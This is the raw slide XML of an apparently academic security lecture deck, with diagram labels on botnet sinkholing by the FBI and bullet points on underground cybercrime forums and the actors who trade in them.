        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3249648" y="5553534"/>
            <a:ext cx="4094896" cy="510898"/>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83" name="Straight Connector 82">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1AB65908-1CFE-4BEE-B31C-36B77C12A9F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="3249648" y="5553534"/>
            <a:ext cx="5859645" cy="70949"/>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84" name="Straight Connector 83">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A598A10-C60A-40CA-9CDA-89E09EF1B2ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3249648" y="4740903"/>
            <a:ext cx="7824752" cy="812631"/>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87" name="Straight Connector 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75AB95E0-CCBE-4D3C-A944-E0A1CB4FABF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="63" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3249649" y="3558669"/>
            <a:ext cx="6476292" cy="1951607"/>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68" name="Straight Connector 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DED9EB44-890B-4F59-84A6-0E7078F819CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="59" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3294487" y="4796736"/>
            <a:ext cx="1842102" cy="756798"/>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64" name="Straight Connector 63">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{473C2FEF-8704-4FAD-A06D-DCB826A0C49E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1226351" y="5624484"/>
            <a:ext cx="1651214" cy="77940"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="57150">
            <a:solidFill>
              <a:schemeClr val="accent3"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent1"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="82"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484" y="4522361"/>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856CB035-4AF0-4F70-89A2-6BEC1F0C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564" y="4585223"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3282900" y="362910"/>
            <a:ext cx="1485920" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Botmaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="D:\Classes\CS 4700\assets\devil-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1079" y="738436"/>
            <a:ext cx="979261" cy="979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2482" y="2081551"/>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2353" y="5510275"/>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9852" y="4411178"/>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4622" y="2620600"/>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999" y="5624483"/>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7951" y="3304525"/>
            <a:ext cx="616648" cy="61664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t0ph3r\Documents\CS 4700\assets\black_ser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5834" y="3992975"/>
            <a:ext cx="616648" cy="616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="TextBox 2048"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9496783" y="2167183"/>
            <a:ext cx="2216693" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Unstructured P2P Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Picture 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FD67C5-82A0-463F-8FEA-F1FEC4868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546" y="1951022"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58" name="Picture 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E3A58C1-7BEA-48C0-B1DF-768CD0EF8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180" y="2605179"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Picture 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{039F1598-5D12-4992-85B1-42492C9C5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335" y="4003954"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFE9D5F-0360-48C6-A6C8-523880B37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2916" y="3347156"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Picture 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0543F34-0590-4302-8AB9-6537FE3EA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212" y="5820578"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Picture 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078DF791-F8C1-4B31-9F0B-432F0CD3E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8341" y="5856129"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Picture 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EDDBA85-98FC-4988-8159-7472D345B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1515" y="4740903"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A48282-109B-4FDC-8845-C21B2263F1CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="813143" y="6064432"/>
            <a:ext cx="569387" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>FBI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Picture 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19E5E081-3F84-46B6-8E3A-57D410E9A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217" y="5097194"/>
            <a:ext cx="967238" cy="967238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A91D730B-7ACE-4ABD-AF04-B27FE4A7340F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2374452" y="4893286"/>
            <a:ext cx="1295760" cy="1603750"/>
            <a:chOff x="2374452" y="4893286"/>
            <a:chExt cx="1295760" cy="1603750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Oval 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0FC7467-81BF-4209-A522-C686DC384575}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2374452" y="5312610"/>
              <a:ext cx="1295760" cy="71064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8832F957-F639-4A45-A900-C8BE4CCFCAC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2399405" y="6035371"/>
              <a:ext cx="1245854" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>Sinkhole</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="90" name="Picture 2" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2726D37-02FB-43C4-9D17-D03FB28B6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033" y="4893286"/>
              <a:ext cx="962154" cy="962154"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:extLst>
              <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
                <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a14:hiddenFill>
              </a:ext>
            </a:extLst>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="85" name="Picture 3" descr="D:\Classes\CS 4700\assets\server.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A6AEFBA-5BB6-4919-8F5D-AB154C3BCC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6167" y="1508813"/>
            <a:ext cx="881062" cy="881062"/>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02C6DEC5-1619-46B7-8802-E27AA1E120E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5008320" y="704056"/>
            <a:ext cx="1396127" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Master Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="88" name="Picture 87">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1E06AEFD-6D67-417C-B6A9-CD31E749C6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7890" y="1076611"/>
            <a:ext cx="744134" cy="744134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89" name="Multiplication Sign 88">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D5658E1-DFE8-4E08-A2F6-E2A7AF87D7BB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5020860" y="1262269"/>
            <a:ext cx="1311675" cy="1311675"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">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0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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="86"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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right)">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="79"/>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randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="28" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="29" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -6.25E-7 -1.11111E-6 L 0.1263 0.07037 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="6315" y="3519"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="31" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="32" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.1263 0.07037 L 0.36914 0.13195 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="12135" y="3079"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.36914 0.13195 L -0.09297 0.59028 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="-23112" y="22917"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                      </p:childTnLst>
                    </p:cTn>
                  </p:par>
                  <p:par>
                    <p:cTn id="37" fill="hold">
                      <p:stCondLst>
                        <p:cond delay="indefinite"/>
                      </p:stCondLst>
                      <p:childTnLst>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="0"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="88"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="88"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="hidden"/>
                                      </p:to>
                                    </p:set>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89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="46" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="89"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:fltVal val="0"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="4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024128" y="965199"/>
            <a:ext cx="6766078" cy="4927601"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-US" sz="4800" kern="1200">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="+mj-lt"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:rPr>
              <a:t>Underground Forums</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8438729" y="965198"/>
            <a:ext cx="2707937" cy="4927602"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFC000"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Where everything is for sale</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="12" name="Straight Connector 11">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4932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eBay for the Underground</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1825625"/>
            <a:ext cx="10515600" cy="4736540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The underground includes many types of illicit actors</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit developers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Botnet operators</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Email and SEO spammers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Carders and cashiers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Just like any other economy, these participants need places to buy and sell their goods</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>“The Deep Web” or “The Dark Web”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IRC chatrooms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Underground forums</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes obfuscated using Tor Hidden Services</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2862136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“An Inquiry into the Nature and Causes of the Wealth of Internet Miscreants”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
